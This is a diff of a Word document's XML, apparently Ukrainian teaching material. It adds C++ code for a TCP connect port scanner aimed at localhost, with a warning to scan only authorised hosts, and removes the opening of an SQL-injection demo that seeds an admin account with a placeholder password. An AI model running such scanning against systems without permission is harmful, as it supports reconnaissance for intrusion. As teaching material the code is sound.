+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">struct ServiceName {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    int port;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    const char* name;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">};</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">const ServiceName KNOWN_SERVICES[] = {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    {21, "FTP"},   {22, "SSH"},   {23, "Telnet"}, {25, "SMTP"},</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    {53, "DNS"},   {80, "HTTP"},  {110, "POP3"},  {143, "IMAP"},</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    {443, "HTTPS"},{445, "SMB"},  {3306, "MySQL"},{3389, "RDP"},</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    {5432, "PostgreSQL"}, {8080, "HTTP-alt"}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">};</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">const char* serviceName(int port) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    for (const ServiceName&amp; service : KNOWN_SERVICES) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        if (service.port == port) return service.name;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return "Unknown";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// Спроба встановити з'єднання: успіх означає, що порт відкритий</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">bool isPortOpen(const std::string&amp; host, int port, int timeoutMs = 500) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    socket_t sock = socket(AF_INET, SOCK_STREAM, 0);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    if (sock == INVALID_SOCK) return false;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    // Обмежуємо час очікування, інакше сканування триватиме надто довго</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#ifdef _WIN32</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    DWORD timeout = static_cast&lt;DWORD&gt;(timeoutMs);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">               reinterpret_cast&lt;const char*&gt;(&amp;timeout), sizeof(timeout));</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#else</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    timeval timeout{ timeoutMs / 1000, (timeoutMs % 1000) * 1000 };</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, &amp;timeout, sizeof(timeout));</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#endif</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sockaddr_in address{};</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    address.sin_family = AF_INET;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    address.sin_port = htons(static_cast&lt;unsigned short&gt;(port));</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    inet_pton(AF_INET, host.c_str(), &amp;address.sin_addr);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    bool opened =</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        connect(sock, reinterpret_cast&lt;sockaddr*&gt;(&amp;address), sizeof(address)) == 0;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    closesocket(sock);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return opened;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">int main() {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    // УВАГА: сканувати дозволено лише власний комп'ютер або вузол,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    // на який є письмовий дозвіл власника</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    const std::string target = "127.0.0.1";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    const std::vector&lt;int&gt; ports = {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        21, 22, 23, 25, 53, 80, 110, 135, 139, 143,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        443, 445, 993, 995, 1433, 3306, 3389, 5432, 8080</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    };</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#ifdef _WIN32</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    WSADATA wsa;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    if (WSAStartup(MAKEWORD(2, 2), &amp;wsa) != 0) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        std::cerr &lt;&lt; "Не вдалося ініціалізувати Winsock\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        return 1;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#endif</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "Сканування " &lt;&lt; target &lt;&lt; "...\n\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "Відкриті порти:\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    int found = 0;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    for (int port : ports) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        if (isPortOpen(target, port)) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">            std::cout &lt;&lt; "  " &lt;&lt; port &lt;&lt; "/tcp - " &lt;&lt; serviceName(port) &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">            ++found;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    if (found == 0) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        std::cout &lt;&lt; "  (жодного з перевірених портів не відкрито)\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#ifdef _WIN32</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    WSACleanup();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#endif</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return 0;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:bookmarkEnd w:id="23"/>
     <w:bookmarkEnd w:id="24"/>
@@ -3466,789 +3956,847 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">// Демонстрація SQL-ін'єкції та захисту від неї.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">// Потрібна бібліотека SQLite: у Visual Studio додайте sqlite3.c і sqlite3.h</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">// до проєкту (амальгама з sqlite.org) або підключіть пакет через NuGet.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#include &lt;iostream&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#include &lt;string&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#include "sqlite3.h"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">// Створює навчальну базу в пам'яті з двома обліковими записами</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">sqlite3* setupDatabase() {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    sqlite3* db = nullptr;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    sqlite3_open(":memory:", &amp;db);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    const char* schema =</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        "CREATE TABLE users ("</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        "  id INTEGER PRIMARY KEY,"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        "  login TEXT NOT NULL,"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        "  password TEXT NOT NULL,"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        "  role TEXT DEFAULT 'user');"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        "INSERT INTO users (login, password, role) "</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        "VALUES ('admin', 'secret123', 'admin');"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
